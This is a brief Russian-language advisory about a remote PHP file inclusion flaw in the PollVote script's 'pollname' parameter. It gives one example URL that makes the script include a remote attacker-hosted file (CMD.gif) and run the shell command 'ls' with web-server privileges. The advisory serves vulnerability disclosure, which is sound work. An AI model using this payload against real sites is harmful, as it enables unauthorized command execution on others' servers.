Программа: PollVote

Уязвимость позволяет удаленному пользователю выполнить произвольный PHP сценарий на целевой системе.
Уязвимость существует из-за недостаточной фильтрации входных данных в параметре "pollname" сценария "pollvote.php". Удаленный пользователь может с помощью специально сформированного URL выполнить произвольные команды на целевой системе с привилегиями web сервера. 

Пример:

http://www.[host].com/[path]/pollvote.php? pollname=http://www.[host].com/CMD.gif?&cmd=ls

  • Подпишись на наc в Telegram!

    Только важные новости и лучшие статьи

    Подписаться

  • Подписаться
    Уведомить о
    0 комментариев
    Межтекстовые Отзывы
    Посмотреть все комментарии